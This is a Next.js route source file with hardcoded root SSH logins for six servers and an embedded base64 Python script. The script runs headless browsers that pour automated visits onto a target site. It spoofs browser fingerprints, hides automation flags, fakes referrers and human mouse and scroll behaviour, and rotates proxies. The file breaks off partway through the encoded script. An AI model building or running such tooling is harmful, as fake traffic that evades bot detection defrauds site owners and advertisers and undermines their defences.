import { NextResponse } from 'next/server';
import { Client } from 'ssh2';

const DEFAULT_SERVERS = [
  { host: '167.172.51.232', username: 'root' },
  { host: '167.99.90.211', username: 'root' },
  { host: '46.101.86.238', username: 'root' },
  { host: '138.68.153.135', username: 'root' },
  { host: '188.166.159.196', username: 'root' },
  { host: '46.101.78.167', username: 'root' }
];

const PYTHON_SCRIPT_B64 = "ZnJvbSBEcmlzc2lvblBhZ2UgaW1wb3J0IENocm9taXVtUGFnZSwgQ2hyb21pdW1PcHRpb25zCmltcG9ydCBzeXMsIHRpbWUsIHJhbmRvbSwgdGhyZWFkaW5nLCBqc29uLCBvcywgbWF0aAoKdmlzaXRfY291bnQgPSAwCmVycm9yX2NvdW50ID0gMApsb2NrID0gdGhyZWFkaW5nLkxvY2soKQpTVEFUVVNfRklMRSA9ICIvcm9vdC92aXNpdF9zdGF0dXMuanNvbiIKCiMgPT09IEZVTEwgRklOR0VSUFJJTlQgREFUQUJBU0UgPT09ClVTRVJfQUdFTlRTID0gWwogICAgIyBDaHJvbWUgV2luZG93cwogICAgJ01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNicsCiAgICAnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEyMS4wLjAuMCBTYWZhcmkvNTM3LjM2JywKICAgICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTIzLjAuMC4wIFNhZmFyaS81MzcuMzYnLAogICAgIyBDaHJvbWUgTWFjCiAgICAnTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTBfMTVfNykgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEyMi4wLjAuMCBTYWZhcmkvNTM3LjM2JywKICAgICdNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxNF8zKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTIyLjAuMC4wIFNhZmFyaS81MzcuMzYnLAogICAgIyBGaXJlZm94CiAgICAnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6MTIzLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMTIzLjAnLAogICAgJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwLjE1OyBydjoxMjMuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMjMuMCcsCiAgICAjIFNhZmFyaQogICAgJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzE1XzcpIEFwcGxlV2ViS2l0LzYwNS4xLjE1IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi8xNy4yIFNhZmFyaS82MDUuMS4xNScsCiAgICAjIE1vYmlsZQogICAgJ01vemlsbGEvNS4wIChpUGhvbmU7IENQVSBpUGhvbmUgT1MgMTdfMyBsaWtlIE1hYyBPUyBYKSBBcHBsZVdlYktpdC82MDUuMS4xNSAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vMTcuMiBNb2JpbGUvMTVFMTQ4IFNhZmFyaS82MDQuMScsCiAgICAnTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDE0OyBTTS1TOTE4QikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEyMi4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNicsCiAgICAnTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDE0OyBQaXhlbCA4KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTIyLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2JywKICAgICMgRWRnZQogICAgJ01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjIuMC4wLjAgU2FmYXJpLzUzNy4zNiBFZGcvMTIyLjAuMC4wJywKXQoKUkVGRVJSRVJTID0gWwogICAgJ2h0dHBzOi8vd3d3Lmdvb2dsZS5jb20vJywgJ2h0dHBzOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3E9c2l0ZScsCiAgICAnaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS5zYS8nLCAnaHR0cHM6Ly93d3cuZ29vZ2xlLmFlLycsCiAgICAnaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tLycsICdodHRwczovL2wuZmFjZWJvb2suY29tLycsCiAgICAnaHR0cHM6Ly90LmNvLycsICdodHRwczovL3R3aXR0ZXIuY29tLycsCiAgICAnaHR0cHM6Ly93d3cuaW5zdGFncmFtLmNvbS8nLCAnaHR0cHM6Ly93d3cueW91dHViZS5jb20vJywKICAgICdodHRwczovL3d3dy50aWt0b2suY29tLycsICdodHRwczovL3d3dy5zbmFwY2hhdC5jb20vJywKICAgICdodHRwczovL3d3dy5saW5rZWRpbi5jb20vJywgJ2h0dHBzOi8vd3d3LnJlZGRpdC5jb20vJywKICAgICcnLCAnJywgJycsICAjIGRpcmVjdCB2aXNpdHMgKDMwJSkKXQoKU0NSRUVOUyA9IFsKICAgICgxOTIwLDEwODApLCAoMTM2Niw3NjgpLCAoMTUzNiw4NjQpLCAoMTQ0MCw5MDApLCAoMTI4MCw3MjApLAogICAgKDI1NjAsMTQ0MCksICgxNjAwLDkwMCksICgxMjgwLDgwMCksICgzODQwLDIxNjApLAogICAgKDM5MCw4NDQpLCAoNDE0LDg5NiksICgzNzUsODEyKSwgKDQyOCw5MjYpLCAoMzYwLDc4MCksCl0KCkxBTkdVQUdFUyA9IFsKICAgICdhci1TQSxhcjtxPTAuOSxlbjtxPTAuOCcsICdhcixlbi1VUztxPTAuOSxlbjtxPTAuOCcsCiAgICAnYXItU0EsYXI7cT0wLjksZW4tVVM7cT0wLjgsZW47cT0wLjcnLCAnZW4tVVMsZW47cT0wLjksYXI7cT0wLjgnLAogICAgJ2FyLUVHLGFyO3E9MC45LGVuO3E9MC44JywgJ2FyLUFFLGFyO3E9MC45LGVuO3E9MC44JywKXQoKVElNRVpPTkVTID0gWydBc2lhL1JpeWFkaCcsJ0FzaWEvRHViYWknLCdBc2lhL0t1d2FpdCcsJ0FzaWEvQmFocmFpbicsJ0FzaWEvUWF0YXInXQoKV0VCR0xfVkVORE9SUyA9IFsKICAgICgnSW50ZWwgSW5jLicsICdJbnRlbCBJcmlzIE9wZW5HTCBFbmdpbmUnKSwKICAgICgnSW50ZWwgSW5jLicsICdJbnRlbCBIRCBHcmFwaGljcyA2MzAnKSwKICAgICgnSW50ZWwgSW5jLicsICdJbnRlbCBVSEQgR3JhcGhpY3MgNzcwJyksCiAgICAoJ0dvb2dsZSBJbmMuIChOVklESUEpJywgJ0FOR0xFIChOVklESUEgR2VGb3JjZSBHVFggMTY1MCknKSwKICAgICgnR29vZ2xlIEluYy4gKE5WSURJQSknLCAnQU5HTEUgKE5WSURJQSBHZUZvcmNlIFJUWCAzMDYwKScpLAogICAgKCdHb29nbGUgSW5jLiAoQU1EKScsICdBTkdMRSAoQU1EIFJhZGVvbiBSWCA1ODApJyksCiAgICAoJ0FwcGxlJywgJ0FwcGxlIE0xJyksCiAgICAoJ0FwcGxlJywgJ0FwcGxlIE0yJyksCl0KClBMQVRGT1JNUyA9IFsnV2luMzInLCAnTWFjSW50ZWwnLCAnTGludXggeDg2XzY0J10KCiMgPT09IFNURUFMVEggSkFWQVNDUklQVCAtIEZ1bGwgZmluZ2VycHJpbnQgc3Bvb2YgPT09CmRlZiBnZXRfc3RlYWx0aF9qcyhzY3JlZW4sIHVhLCB3ZWJnbCk6CiAgICBpc19tb2JpbGUgPSAnaVBob25lJyBpbiB1YSBvciAnQW5kcm9pZCcgaW4gdWEgb3IgJ2lQYWQnIGluIHVhCiAgICBwbGF0Zm9ybSA9ICdpUGhvbmUnIGlmICdpUGhvbmUnIGluIHVhIGVsc2UgKCdMaW51eCBhcm12OGwnIGlmICdBbmRyb2lkJyBpbiB1YSBlbHNlIHJhbmRvbS5jaG9pY2UoUExBVEZPUk1TKSkKICAgIGNvcmVzID0gcmFuZG9tLmNob2ljZShbMiwgNF0gaWYgaXNfbW9iaWxlIGVsc2UgWzQsIDgsIDEyLCAxNl0pCiAgICBtZW1vcnkgPSByYW5kb20uY2hvaWNlKFs0LCA2XSBpZiBpc19tb2JpbGUgZWxzZSBbNCwgOCwgMTYsIDMyXSkKICAgIHRvdWNoID0gcmFuZG9tLnJhbmRpbnQoMSwgNSkgaWYgaXNfbW9iaWxlIGVsc2UgMAogICAgCiAgICByZXR1cm4gZiIiIgovLyA9PT0gQ09SRTogSGlkZSBhdXRvbWF0aW9uID09PQpPYmplY3QuZGVmaW5lUHJvcGVydHkobmF2aWdhdG9yLCAnd2ViZHJpdmVyJywge3tnZXQ6ICgpID0+IHVuZGVmaW5lZH19KTsKdHJ5IHt7IGRlbGV0ZSBuYXZpZ2F0b3IuX19wcm90b19fLndlYmRyaXZlcjsgfX0gY2F0Y2goZSkge3t9fQoKLy8gQ2hyb21lIHJ1bnRpbWUKd2luZG93LmNocm9tZSA9IHt7cnVudGltZToge3t9fSwgbG9hZFRpbWVzOiBmdW5jdGlvbigpe3tyZXR1cm4ge3t9fX19LCBjc2k6IGZ1bmN0aW9uKCl7e3JldHVybiB7e319fX19fTsKCi8vID09PSBGSU5HRVJQUklOVDogTmF2aWdhdG9yID09PQpPYmplY3QuZGVmaW5lUHJvcGVydHkobmF2aWdhdG9yLCAncGx1Z2lucycsIHt7Z2V0OiAoKSA9PiBbCiAgICB7e25hbWU6J0Nocm9tZSBQREYgUGx1Z2luJyxmaWxlbmFtZTonaW50ZXJuYWwtcGRmLXZpZXdlcicsbGVuZ3RoOjF9fSwKICAgIHt7bmFtZTonQ2hyb21lIFBERiBWaWV3ZXInLGZpbGVuYW1lOidtaGpmYm1kZ2NmamJicGFlb2pvZm9ob2VmZ2llaGphaScsbGVuZ3RoOjF9fSwKICAgIHt7bmFtZTonTmF0aXZlIENsaWVudCcsZmlsZW5hbWU6J2ludGVybmFsLW5hY2wtcGx1Z2luJyxsZW5ndGg6Mn19Cl19fSk7Ck9iamVjdC5kZWZpbmVQcm9wZXJ0eShuYXZpZ2F0b3IsICdsYW5ndWFnZXMnLCB7e2dldDogKCkgPT4ge2pzb24uZHVtcHMocmFuZG9tLmNob2ljZShMQU5HVUFHRVMpLnNwbGl0KCcsJylbOjNdKX19fSk7Ck9iamVjdC5kZWZpbmVQcm9wZXJ0eShuYXZpZ2F0b3IsICdwbGF0Zm9ybScsIHt7Z2V0OiAoKSA9PiAne3BsYXRmb3JtfSd9fSk7Ck9iamVjdC5kZWZpbmVQcm9wZXJ0eShuYXZpZ2F0b3IsICdoYXJkd2FyZUNvbmN1cnJlbmN5Jywge3tnZXQ6ICgpID0+IHtjb3Jlc319fSk7Ck9iamVjdC5kZWZpbmVQcm9wZXJ0eShuYXZpZ2F0b3IsICdkZXZpY2VNZW1vcnknLCB7e2dldDogKCkgPT4ge21lbW9yeX19fSk7Ck9iamVjdC5kZWZpbmVQcm9wZXJ0eShuYXZpZ2F0b3IsICdtYXhUb3VjaFBvaW50cycsIHt7Z2V0OiAoKSA9PiB7dG91Y2h9fX0pOwpPYmplY3QuZGVmaW5lUHJvcGVydHkobmF2aWdhdG9yLCAndmVuZG9yJywge3tnZXQ6ICgpID0+ICdHb29nbGUgSW5jLid9fSk7Ck9iamVjdC5kZWZpbmVQcm9wZXJ0eShuYXZpZ2F0b3IsICdhcHBWZXJzaW9uJywge3tnZXQ6ICgpID0+ICd7dWEucmVwbGFjZSgiTW96aWxsYS8iLCAiIil9J319KTsKCi8vID09PSBGSU5HRVJQUklOVDogU2NyZWVuID09PQpPYmplY3QuZGVmaW5lUHJvcGVydHkoc2NyZWVuLCAnd2lkdGgnLCB7e2dldDogKCkgPT4ge3NjcmVlblswXX19fSk7Ck9iamVjdC5kZWZpbmVQcm9wZXJ0eShzY3JlZW4sICdoZWlnaHQnLCB7e2dldDogKCkgPT4ge3NjcmVlblsxXX19fSk7Ck9iamVjdC5kZWZpbmVQcm9wZXJ0eShzY3JlZW4sICdhdmFpbFdpZHRoJywge3tnZXQ6ICgpID0+IHtzY3JlZW5bMF19fX0pOwpPYmplY3QuZGVmaW5lUHJvcGVydHkoc2NyZWVuLCAnYXZhaWxIZWlnaHQnLCB7e2dldDogKCkgPT4ge3NjcmVlblsxXSAtIHJhbmRvbS5yYW5kaW50KDMwLCA1MCl9fX0pOwpPYmplY3QuZGVmaW5lUHJvcGVydHkoc2NyZWVuLCAnY29sb3JEZXB0aCcsIHt7Z2V0OiAoKSA9PiAyNH19KTsKT2JqZWN0LmRlZmluZVByb3BlcnR5KHNjcmVlbiwgJ3BpeGVsRGVwdGgnLCB7e2dldDogKCkgPT4gMjR9fSk7CgovLyA9PT0gRklOR0VSUFJJTlQ6IFdlYkdMID09PQpjb25zdCBnZXRQYXJhbSA9IFdlYkdMUmVuZGVyaW5nQ29udGV4dC5wcm90b3R5cGUuZ2V0UGFyYW1ldGVyOwpXZWJHTFJlbmRlcmluZ0NvbnRleHQucHJvdG90eXBlLmdldFBhcmFtZXRlciA9IGZ1bmN0aW9uKHApIHt7CiAgICBpZiAocCA9PT0gMzc0NDUpIHJldHVybiAne3dlYmdsWzBdfSc7CiAgICBpZiAocCA9PT0gMzc0NDYpIHJldHVybiAne3dlYmdsWzFdfSc7CiAgICByZXR1cm4gZ2V0UGFyYW0uY2FsbCh0aGlzLCBwKTsKfX07CnRyeSB7ewogICAgY29uc3QgZ2V0UGFyYW0yID0gV2ViR0wyUmVuZGVyaW5nQ29udGV4dC5wcm90b3R5cGUuZ2V0UGFyYW1ldGVyOwogICAgV2ViR0wyUmVuZGVyaW5nQ29udGV4dC5wcm90b3R5cGUuZ2V0UGFyYW1ldGVyID0gZnVuY3Rpb24ocCkge3sKICAgICAgICBpZiAocCA9PT0gMzc0NDUpIHJldHVybiAne3dlYmdsWzBdfSc7CiAgICAgICAgaWYgKHAgPT09IDM3NDQ2KSByZXR1cm4gJ3t3ZWJnbFsxXX0nOwogICAgICAgIHJldHVybiBnZXRQYXJhbTIuY2FsbCh0aGlzLCBwKTsKICAgIH19Owp9fSBjYXRjaChlKSB7e319CgovLyA9PT0gRklOR0VSUFJJTlQ6IENhbnZhcyBub2lzZSA9PT0KY29uc3Qgb3JpZ1RvRGF0YVVSTCA9IEhUTUxDYW52YXNFbGVtZW50LnByb3RvdHlwZS50b0RhdGFVUkw7CkhUTUxDYW52YXNFbGVtZW50LnByb3RvdHlwZS50b0RhdGFVUkwgPSBmdW5jdGlvbih0eXBlKSB7ewogICAgaWYgKHRoaXMud2lkdGggPiAxNiAmJiB0aGlzLmhlaWdodCA+IDE2KSB7ewogICAgICAgIHRyeSB7ewogICAgICAgICAgICBjb25zdCBjdHggPSB0aGlzLmdldENvbnRleHQoJzJkJyk7CiAgICAgICAgICAgIGlmIChjdHgpIHt7CiAgICAgICAgICAgICAgICBjb25zdCBpbWdEYXRhID0gY3R4LmdldEltYWdlRGF0YSgwLCAwLCBNYXRoLm1pbih0aGlzLndpZHRoLCA1KSwgTWF0aC5taW4odGhpcy5oZWlnaHQsIDUpKTsKICAgICAgICAgICAgICAgIGZvciAobGV0IGkgPSAwOyBpIDwgaW1nRGF0YS5kYXRhLmxlbmd0aDsgaSArPSA0KSB7ewogICAgICAgICAgICAgICAgICAgIGltZ0RhdGEuZGF0YVtpXSA9IGltZ0RhdGEuZGF0YVtpXSBeIHtyYW5kb20ucmFuZGludCgxLCAzKX07CiAgICAgICAgICAgICAgICB9fQogICAgICAgICAgICAgICAgY3R4LnB1dEltYWdlRGF0YShpbWdEYXRhLCAwLCAwKTsKICAgICAgICAgICAgfX0KICAgICAgICB9fSBjYXRjaChlKSB7e319CiAgICB9fQogICAgcmV0dXJuIG9yaWdUb0RhdGFVUkwuYXBwbHkodGhpcywgYXJndW1lbnRzKTsKfX07CgovLyA9PT0gRklOR0VSUFJJTlQ6IEF1ZGlvIG5vaXNlID09PQp0cnkge3sKICAgIGNvbnN0IG9yaWdHZXRDaGFubmVsRGF0YSA9IEF1ZGlvQnVmZmVyLnByb3RvdHlwZS5nZXRDaGFubmVsRGF0YTsKICAgIEF1ZGlvQnVmZmVyLnByb3RvdHlwZS5nZXRDaGFubmVsRGF0YSA9IGZ1bmN0aW9uKGNoKSB7ewogICAgICAgIGNvbnN0IGRhdGEgPSBvcmlnR2V0Q2hhbm5lbERhdGEuY2FsbCh0aGlzLCBjaCk7CiAgICAgICAgaWYgKGRhdGEubGVuZ3RoID4gMTAwKSB7ewogICAgICAgICAgICBmb3IgKGxldCBpID0gMDsgaSA8IDEwOyBpKyspIGRhdGFbaV0gKz0gKE1hdGgucmFuZG9tKCkgKiAwLjAwMDEgLSAwLjAwMDA1KTsKICAgICAgICB9fQogICAgICAgIHJldHVybiBkYXRhOwogICAgfX07Cn19IGNhdGNoKGUpIHt7fX0KCi8vID09PSBGSU5HRVJQUklOVDogUGVybWlzc2lvbnMgPT09CnRyeSB7ewogICAgY29uc3Qgb3JpZ1F1ZXJ5ID0gbmF2aWdhdG9yLnBlcm1pc3Npb25zLnF1ZXJ5OwogICAgbmF2aWdhdG9yLnBlcm1pc3Npb25zLnF1ZXJ5ID0gKHApID0+ICgKICAgICAgICBwLm5hbWUgPT09ICdub3RpZmljYXRpb25zJyA/IFByb21pc2UucmVzb2x2ZSh7e3N0YXRlOiAncHJvbXB0J319KSA6IG9yaWdRdWVyeShwKQogICAgKTsKfX0gY2F0Y2goZSkge3t9fQoKLy8gPT09IEFOVEktREVURUNUOiBDb25uZWN0aW9uIGluZm8gPT09CnRyeSB7ewogICAgT2JqZWN0LmRlZmluZVByb3BlcnR5KG5hdmlnYXRvciwgJ2Nvbm5lY3Rpb24nLCB7e2dldDogKCkgPT4gKHt7CiAgICAgICAgZWZmZWN0aXZlVHlwZTogJ3tyYW5kb20uY2hvaWNlKFsiNGciLCAiM2ciXSl9JywKICAgICAgICBydHQ6IHtyYW5kb20uY2hvaWNlKFs1MCwgMTAwLCAxNTBdKX0sCiAgICAgICAgZG93bmxpbms6IHtyYW5kb20uY2hvaWNlKFs1LCAxMCwgMTUsIDIwXSl9LAogICAgICAgIHNhdmVEYXRhOiBmYWxzZQogICAgfX0pfX0pOwp9fSBjYXRjaChlKSB7e319CgovLyA9PT0gQU5USS1ERVRFQ1Q6IEJhdHRlcnkgQVBJID09PQp0cnkge3sKICAgIG5hdmlnYXRvci5nZXRCYXR0ZXJ5ID0gKCkgPT4gUHJvbWlzZS5yZXNvbHZlKHt7CiAgICAgICAgY2hhcmdpbmc6IHtzdHIocmFuZG9tLmNob2ljZShbVHJ1ZSwgRmFsc2VdKSkubG93ZXIoKX0sCiAgICAgICAgY2hhcmdpbmdUaW1lOiB7cmFuZG9tLmNob2ljZShbMCwgMzYwMCwgNzIwMF0pfSwKICAgICAgICBkaXNjaGFyZ2luZ1RpbWU6IEluZmluaXR5LAogICAgICAgIGxldmVsOiB7cm91bmQocmFuZG9tLnVuaWZvcm0oMC4zLCAxLjApLCAyKX0KICAgIH19KTsKfX0gY2F0Y2goZSkge3t9fQoiIiIKCmRlZiB3cml0ZV9zdGF0dXMobWF4X3Zpc2l0b3JzLCBzdGFydF90aW1lLCBzdGF0dXM9InJ1bm5pbmciKToKICAgIGdsb2JhbCB2aXNpdF9jb3VudCwgZXJyb3JfY291bnQKICAgIGVsYXBzZWQgPSBpbnQodGltZS50aW1lKCkgLSBzdGFydF90aW1lKQogICAgcHJvZ3Jlc3MgPSBtaW4oMTAwLCByb3VuZCgodmlzaXRfY291bnQgLyBtYXhfdmlzaXRvcnMpICogMTAwLCAxKSkgaWYgbWF4X3Zpc2l0b3JzID4gMCBlbHNlIDAKICAgIGRhdGEgPSB7CiAgICAgICAgInN0YXR1cyI6IHN0YXR1cywgInZpc2l0cyI6IHZpc2l0X2NvdW50LCAidGFyZ2V0IjogbWF4X3Zpc2l0b3JzLAogICAgICAgICJwcm9ncmVzcyI6IHByb2dyZXNzLCAiZWxhcHNlZCI6IGVsYXBzZWQsCiAgICAgICAgImVycm9ycyI6IGVycm9yX2NvdW50LCAidGltZXN0YW1wIjogaW50KHRpbWUudGltZSgpKQogICAgfQogICAgdHJ5OgogICAgICAgIHdpdGggb3BlbihTVEFUVVNfRklMRSwgInciKSBhcyBmOgogICAgICAgICAgICBqc29uLmR1bXAoZGF0YSwgZikKICAgIGV4Y2VwdDoKICAgICAgICBwYXNzCgpkZWYgY3JlYXRlX2Jyb3dzZXIocHJveHk9Tm9uZSk6CiAgICBjbyA9IENocm9taXVtT3B0aW9ucygpCiAgICBjby5oZWFkbGVzcygpCiAgICBjby5hdXRvX3BvcnQoKQogICAgCiAgICAjIEJhc2ljCiAgICBjby5zZXRfYXJndW1lbnQoJy0tbm8tc2FuZGJveCcpCiAgICBjby5zZXRfYXJndW1lbnQoJy0tZGlzYWJsZS1ncHUnKQogICAgY28uc2V0X2FyZ3VtZW50KCctLWRpc2FibGUtZGV2LXNobS11c2FnZScpCiAgICBjby5zZXRfYXJndW1lbnQoJy0tZGlzYWJsZS1leHRlbnNpb25zJykKICAgIGNvLnNldF9hcmd1bWVudCgnLS1uby1maXJzdC1ydW4nKQogICAgY28uc2V0X2FyZ3VtZW50KCctLW11dGUtYXVkaW8nKQogICAgY28uc2V0X2FyZ3VtZW50KCctLWpzLWZsYWdzPS0tbWF4LW9sZC1zcGFjZS1zaXplPTEyOCcpCiAgICBjby5zZXRfYXJndW1lbnQoJy0tZGlzYWJsZS1zb2Z0d2FyZS1yYXN0ZXJpemVyJykKICAgIAogICAgIyBBbnRpLWRldGVjdGlvbiBDaHJvbWUgZmxhZ3MKICAgIGNvLnNldF9hcmd1bWVudCgnLS1kaXNhYmxlLWJsaW5rLWZlYXR1cmVzPUF1dG9tYXRpb25Db250cm9sbGVkJykKICAgIGNvLnNldF9hcmd1bWVudCgnLS1kaXNhYmxlLWZlYXR1cmVzPUlzb2xhdGVPcmlnaW5zLHNpdGUtcGVyLXByb2Nlc3MnKQogICAgY28uc2V0X2FyZ3VtZW50KCctLWRpc2FibGUtaW5mb2JhcnMnKQogICAgY28uc2V0X2FyZ3VtZW50KCctLWRpc2FibGUtYmFja2dyb3VuZC10aW1lci10aHJvdHRsaW5nJykKICAgIGNvLnNldF9hcmd1bWVudCgnLS1kaXNhYmxlLWJhY2tncm91bmRpbmctb2NjbHVkZWQtd2luZG93cycpCiAgICBjby5zZXRfYXJndW1lbnQoJy0tZGlzYWJsZS1yZW5kZXJlci1iYWNrZ3JvdW5kaW5nJykKICAgIGNvLnNldF9hcmd1bWVudCgnLS1kaXNhYmxlLWlwYy1mbG9vZGluZy1wcm90ZWN0aW9uJykKICAgIAogICAgIyBSYW5kb20gZmluZ2VycHJpbnQgcGVyIGJyb3dzZXIKICAgIHNjcmVlbiA9IHJhbmRvbS5jaG9pY2UoU0NSRUVOUykKICAgIHVhID0gcmFuZG9tLmNob2ljZShVU0VSX0FHRU5UUykKICAgIGxhbmcgPSByYW5kb20uY2hvaWNlKExBTkdVQUdFUykKICAgIHdlYmdsID0gcmFuZG9tLmNob2ljZShXRUJHTF9WRU5ET1JTKQogICAgCiAgICBjby5zZXRfYXJndW1lbnQoZictLXdpbmRvdy1zaXplPXtzY3JlZW5bMF19LHtzY3JlZW5bMV19JykKICAgIGNvLnNldF9hcmd1bWVudChmJy0tbGFuZz17bGFuZy5zcGxpdCgiLCIpWzBdfScpCiAgICBjby5zZXRfdXNlcl9hZ2VudCh1YSkKICAgIAogICAgIyBUaW1lem9uZQogICAgb3MuZW52aXJvblsnVFonXSA9IHJhbmRvbS5jaG9pY2UoVElNRVpPTkVTKQogICAgCiAgICBpZiBwcm94eToKICAgICAgICBjby5zZXRfYXJndW1lbnQoZictLXByb3h5LXNlcnZlcj17cHJveHlbImhvc3QiXX06e3Byb3h5WyJwb3J0Il19JykKICAgIAogICAgdHJ5OgogICAgICAgIHBhZ2UgPSBDaHJvbWl1bVBhZ2UoYWRkcl9vcl9vcHRzPWNvKQogICAgICAgICMgSW5qZWN0IHN0ZWFsdGggSlMKICAgICAgICB0cnk6CiAgICAgICAgICAgIHBhZ2UucnVuX2pzKGdldF9zdGVhbHRoX2pzKHNjcmVlbiwgdWEsIHdlYmdsKSkKICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgIHBhc3MKICAgICAgICByZXR1cm4gcGFnZSwgdWEsIHNjcmVlbiwgd2ViZ2wKICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICBwcmludChmIkJyb3dzZXIgZXJyb3I6IHtlfSIsIGZsdXNoPVRydWUpCiAgICAgICAgcmV0dXJuIE5vbmUsIHVhLCBzY3JlZW4sIHdlYmdsCgpkZWYgaHVtYW5fYmVoYXZpb3JfZmFzdChwYWdlKToKICAgICIiIkZhc3QgaHVtYW4gYmVoYXZpb3IgLSBtaW5pbWFsIHNwZWVkIGltcGFjdCIiIgogICAgdHJ5OgogICAgICAgICMgUXVpY2sgbW91c2UgbW92ZSAoMG1zIGltcGFjdCAtIGFzeW5jIEpTKQogICAgICAgIHBhZ2UucnVuX2pzKCcnJwogICAgICAgICAgICAoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgIHZhciBwdHMgPSBbXTsKICAgICAgICAgICAgICAgIHZhciBzeCA9IE1hdGgucmFuZG9tKCkqMzAwKzEwMCwgc3kgPSBNYXRoLnJhbmRvbSgpKjIwMCsxMDA7CiAgICAgICAgICAgICAgICB2YXIgZXggPSBNYXRoLnJhbmRvbSgpKjgwMCsyMDAsIGV5ID0gTWF0aC5yYW5kb20oKSo2MDArMTAwOwogICAgICAgICAgICAgICAgZm9yKHZhciBpPTA7aTw9NTtpKyspewogICAgICAgICAgICAgICAgICAgIHZhciB0PWkvNTsKICAgICAgICAgICAgICAgICAgICB2YXIgeD1zeCsoZXgtc3gpKnQrTWF0aC5zaW4odCozLjE0KSoyMCooTWF0aC5yYW5kb20oKS0wLjUpOwogICAgICAgICAgICAgICAgICAgIHZhciB5PXN5KyhleS1zeSkqdCtNYXRoLmNvcyh0KjMuMTQpKjE1KihNYXRoLnJhbmRvbSgpLTAuNSk7CiAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuZGlzcGF0Y2hFdmVudChuZXcgTW91c2VFdmVudCgnbW91c2Vtb3ZlJyx7Y2xpZW50WDp4LGNsaWVudFk6eSxidWJibGVzOnRydWV9KSk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIH0pKCk7CiAgICAgICAgJycnKQogICAgICAgIAogICAgICAgICMgUXVpY2sgc2Nyb2xsICgwLjMtMC42cykKICAgICAgICBzY3JvbGxfeSA9IHJhbmRvbS5yYW5kaW50KDE1MCwgNjAwKQogICAgICAgIHBhZ2UucnVuX2pzKGYnJycKICAgICAgICAgICAgKGZ1bmN0aW9uKCl7ewogICAgICAgICAgICAgICAgdmFyIHRvdGFsPTAsIHRhcmdldD17c2Nyb2xsX3l9LCBzdGVwPXRhcmdldC80OwogICAgICAgICAgICAgICAgdmFyIGl2PXNldEludGVydmFsKGZ1bmN0aW9uKCl7ewogICAgICAgICAgICAgICAgICAgIHdpbmRvdy5zY3JvbGxCeSgwLCBzdGVwKTsKICAgICAgICAgICAgICAgICAgICB0b3RhbCs9c3RlcDsKICAgICAgICAgICAgICAgICAgICBpZih0b3RhbD49dGFyZ2V0KSBjbGVhckludGVydmFsKGl2KTsKICAgICAgICAgICAgICAgIH19LCA4MCk7CiAgICAgICAgICAgIH19KSgpOwogICAgICAgICcnJykKICAgICAgICB0aW1lLnNsZWVwKHJhbmRvbS51bmlmb3JtKDAuMywgMC42KSkKICAgICAgICAKICAgICAgICAjIFNjcm9sbCBiYWNrIHVwIGEgYml0ICg1MCUgY2hhbmNlKQogICAgICAgIGlmIHJhbmRvbS5yYW5kb20oKSA+IDAuNToKICAgICAgICAgICAgcGFnZS5ydW5fanMoZid3aW5kb3cuc2Nyb2xsQnkoMCwgLXtyYW5kb20ucmFuZGludCg1MCwgMTUwKX0pJykKICAgICAgICAKICAgICAgICAjIFF1aWNrIHBhZ2Ugc3RheQogICAgICAgIHRpbWUuc2xlZXAocmFuZG9tLnVuaWZvcm0oMC41LCAxLjUpKQogICAgICAgIAogICAgZXhjZXB0OgogICAgICAgIHBhc3MKCmRlZiB3b3JrZXIod2lkLCB0YXJnZXRfdXJsLCBtYXhfdmlzaXRzLCBzdGFydF90aW1lLCBwcm94aWVzKToKICAgIGdsb2JhbCB2aXNpdF9jb3VudCwgZXJyb3JfY291bnQKICAgIAogICAgdmlzaXRzX3RoaXNfYnJvd3NlciA9IDAKICAgIG1heF9wZXJfYnJvd3NlciA9IHJhbmRvbS5yYW5kaW50KDE1LCAzMCkKICAgIHBhZ2